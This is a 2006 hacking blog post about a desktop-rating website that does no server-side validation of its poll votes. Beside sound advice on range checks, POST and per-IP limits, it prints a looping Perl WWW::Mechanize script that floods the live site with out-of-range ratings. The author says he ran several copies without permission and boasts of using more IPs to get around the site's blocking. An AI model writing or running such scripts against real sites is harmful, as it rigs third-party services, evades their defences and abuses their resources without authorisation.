Oopsies, can we say “no validation”?
Post by: Snarky on April 22nd, 2006 | Filed Under Hacking, ProgrammingI'm posting this as is, since time is key on this post. My CSS is screwed somehow, have to fix that, also it appears they caught on to my trick, and might validate now.
So... one big caveat of 'secure programming" is to validate anything you're given. if you don't check that you get what you expect, well, people will give you something you don't, and Bad Things happen. The worst offender of this little problem is the internet. Yup, a lot of web sites figure "We'll put a cap on the web form's input, and not check server side, that'd be inefficient." Interesting theory, lets see what happens when you make this assumption on http://www.ratemydesktop.co.uk, where I posted a screenshot of my desktop.
First off, quick HTMl lesson for those of you who don't know. To display a form, a form being a place the user can input data, on a website, you use the
<form>
tag. So, a full form might look something like
<form>
<input type='radio' onClick="window.location='index.php?ac=0&id=165&rating=1';">1
<input type='radio' onClick="window.location='index.php?ac=0&id=165&rating=2';">2
<input type='radio' onClick="window.location='index.php?ac=0&id=165&rating=3';">3
<input type='radio' onClick="window.location='index.php?ac=0&id=165&rating=4';">4
<input type='radio' onClick="window.location='index.php?ac=0&id=165&rating=5';">5
<input type='radio' onClick="window.location='index.php?ac=0&id=165&rating=6';">6
<input type='radio' onClick="window.location='index.php?ac=0&id=165&rating=7';">7
<input type='radio' onClick="window.location='index.php?ac=0&id=165&rating=8';">8
<input type='radio' onClick="window.location='index.php?ac=0&id=165&rating=9';">9
<input type='radio' onClick="window.location='index.php?ac=0&id=165&rating=10';">10
<input type='radio' onClick="window.location='index.php?ac=2&id=165';">Don't vote
</form>
So, the above is an example of a bad form, but a form none the less, for a poll. You have 10 radio buttons, and when you click any of them, it sends you to a page that adds the vote. This is kind of a bad way to do things, I'd make those regular buttons, not rado buttons, but that's just me.
Now, where's the hack here? Can anyone spot why this is a horrible form? I'll give you a hint, it's in "window.location='index.php?ac=0&id=165&rating=8". window.location is javascript that sends you to another page. So what this does is sends you to index.php, and passes it a few variables. now do you see it? It, first off, just sends the data as GET variables. That can be easily faked. Second it sends the rating as a variable too. Now, to make this secure, you should check that the rating is between 1 and 10. Also, send this as POST, so people can't just send the data in the URL bar as a fake. Finally, whatever page you send it to should have some sort of limit on connections from one IP, and votes per IP at the very least. Otherwise, people do stupid things like this. Note both the number of votes as compared to others, as well as the rating. (It's trending to 31337, just for fun).
So, how'd I do that? I used a fun perl module called WWW::Mechanize (overkill, I know), and made it go to the webpage on rating 10. (Those links above, they're for my desktop). The whole thing is 11 lines, with some that can easily cut out (I think it could easily be only 6). Here it is:
#!/usr/bin/perl use WWW::Mechanize; my $mech = WWW::Mechanize->new( autocheck => 1 ); $vote_page = "http://www.ratemydesktop.co.uk/index.php?ac=4&id=165&rating=31337&tp=4&sstr=155"; $x = 1; while($x ne -1) { print "Voting - $x\n"; $mech->get( $vote_page ); $x++; }
Finally, I ssh'd into my box at home, where I wrote the above script, and started it running a coupla times.
I realize this post is kinda rambling, but I'm writing it as I do this, and I've gotta get off to class. It appears they did kill my connections just now, all of them at once, but I was able to start them right back up. However, I stopped influencing the rating a while ago, so they might indeed have some sort of check in place. No matter, I've got enough IPs to get it to 31337 soon enough.
Comments (One response so far)